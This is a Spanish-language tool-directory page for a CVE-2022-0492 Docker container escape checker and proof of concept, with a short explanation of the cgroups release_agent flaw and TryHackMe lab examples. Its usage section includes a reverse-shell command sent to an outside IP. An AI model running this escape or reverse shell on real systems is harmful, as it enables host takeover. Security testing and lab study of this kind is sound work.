Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-0492-Docker-Breakout-Checker-and-PoC — Comprobador de escape de Docker y PoC a través de CAP_SYS_ADMIN y de espacios de nombres de usuario (CVE-2022-0492) | Kitploit
Herramientas/GitHubGitHub/t1erno/cve-2022-0492-docker-breakout-checker-and-poc
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad en la NubeAprendizaje y EducaciónEscape de ContenedoresLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubt1erno/cve-2022-0492-docker-breakout-checker-and-poc

CVE-2022-0492-Docker-Breakout-Checker-and-PoC

Comprobador de escape de Docker y PoC a través de CAP_SYS_ADMIN y de espacios de nombres de usuario (CVE-2022-0492)

Ver Repositorio
81hace 3 añosAún no revisado

Comprobador y PoC de escape de Docker CVE-2022-0492

Resumen

Explotar la vulnerabilidad requiere que el atacante tenga acceso a un contenedor Docker que se ejecute en un sistema vulnerable. Una vez explotada, el atacante puede escapar del contenedor y obtener un control total sobre el sistema host.

Se encontró una vulnerabilidad en la función cgroup_release_agent_write del kernel de Linux en el archivo kernel/cgroup/cgroup-v1.c. Esta falla, bajo ciertas circunstancias, permite el uso de la función release_agent de cgroups v1 para escalar privilegios y eludir el aislamiento del namespace de forma inesperada.

Dicho de forma más simple, cgroups v1 tiene una función llamada release_agent que ejecuta un programa cuando un proceso en el cgroup termina. Si notify_on_release está habilitado, el kernel ejecuta el binario release_agent como root. Al editar el archivo release_agent, un atacante puede ejecutar su propio binario con privilegios elevados, tomando el control del sistema. Sin embargo, el archivo release_agent pertenece a root, por lo que solo un usuario con acceso root puede modificarlo.

Uso

root@kitploit:~
# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Ejecute este script en un Docker para comprobar la vulnerabilidad o explotarla. (º___\/{
[>] Uso:
        sh CVE-2022-0492.sh    --checker                Verificar si el sistema es vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Ejecutar un comando en la máquina host.
        sh CVE-2022-0492.sh -h|--help                   Mostrar el panel de ayuda.

[>] Ejemplo:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

Ejemplos

Hamlet de TryHackMe

Usuario root en la máquina host comprometida deshabilitando UFW y luego enviando una reverse shell.

Misguided Ghosts de TryHackMe

Usuario root en la máquina host comprometida estableciendo SUID a bash, también envió una reverse shell.

Fuentes:

  • https://github.com/puckiestyle/CVE-2022-0492
  • http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492
Descargar herramienta